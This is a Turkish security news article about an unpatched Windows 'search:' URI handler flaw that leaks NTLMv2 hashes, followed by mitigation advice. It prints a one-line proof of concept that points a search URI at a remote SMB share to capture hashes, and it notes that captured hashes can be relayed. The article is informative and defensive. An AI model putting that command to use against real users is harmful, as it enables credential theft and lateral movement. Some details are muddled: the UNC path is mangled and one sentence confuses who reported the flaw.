NTLMv2 Hash Sızıntısı: Tehdit ve Önemi
Cybersecurity alanında araştırmacılar, kullanıcıların NTLMv2 hash’lerinin sızdırılmasına yol açabilecek yamanmamış bir güvenlik açığını gün yüzüne çıkardılar. Bu durum, kullanıcı gizliliği ve ağ güvenliği açısından büyük bir tehdit oluşturmaktadır.
Saldırı Nasıl Çalışıyor?
Mevcut açığın kaynaklandığı yer, Windows Snipping Tool’ün CVE-2026-33829 numaralı güvenlik açığı ile benzerlik göstermektedir. https://www.huntress.com/blog/unpatched-ntlm-leak-windows-search-uri-handler kaynaklı bilgilere göre, sorun “search:” URI yöneticisi ile ilişkilidir. Özellikle, bu URI yöneticisi “filePath” parametresini kabul ediyor ve bu parametreyi doğrulamıyor. Sonuç olarak, saldırganlar belirtilen herhangi bir Universal Naming Convention (UNC) yoluna bağlanarak NTLM kimlik doğrulaması yapabiliyorlar.
start "" "search:query=test&crumb=location:\10.0.1.100share"Etkilenen Sistemler
Bu güvenlik açığı, özellikle aşağıdaki sistemleri etkileyebilir:
- Windows işletim sistemleri
- Windows Snipping Tool ve diğer URI yöneticileri
Ayrıca, CVE-2023-35636 kapsamında “crumb” parametresi kullanılarak benzer NTLM sızıntıları daha önce belgelenmiştir. Varonis, bu durumu Şubat 2024’te raporlamıştır.
Çözüm ve Korunma
Bir tehdit aktörü, yakalanan hash’i kullanarak relay saldırıları gerçekleştirebilir ve bir ağda daha derin erişim elde edebilir. Microsoft, 15 Nisan 2026’da durumu sorumlu bir şekilde bildirip mevcut problemi çözmeyi reddetti ve yalnızca “Önemli” ve “Kritik” seviyesindeki sorunları ele alacaklarına vurgu yaptı.
Mevcut çözüm önerileri şunlardır:
- Ağda outbound SMB (TCP/445 ve TCP/139) trafiğini engelleyin.
- Yakaladığınız hash’lerin iç hizmetlere karşı relay edilmesini önlemek için SMB imzalamayı zorunlu hale getirin.
- Mümkünse NTLM‘yi devre dışı bırakın.
Sonuç
Kullanıcıların ve sistem yöneticilerinin, bu güvenlik açığını göz önünde bulundurarak sistemlerini güncellemeleri, gerektiğinde portları kapatmaları ve sızdırma riskini minimize etmek için yukarıda belirtilen önlemleri almaları kritik bir önem taşımaktadır. Tedbir almak, olası saldırılara karşı önlem almak için atılacak en doğru adımdır.
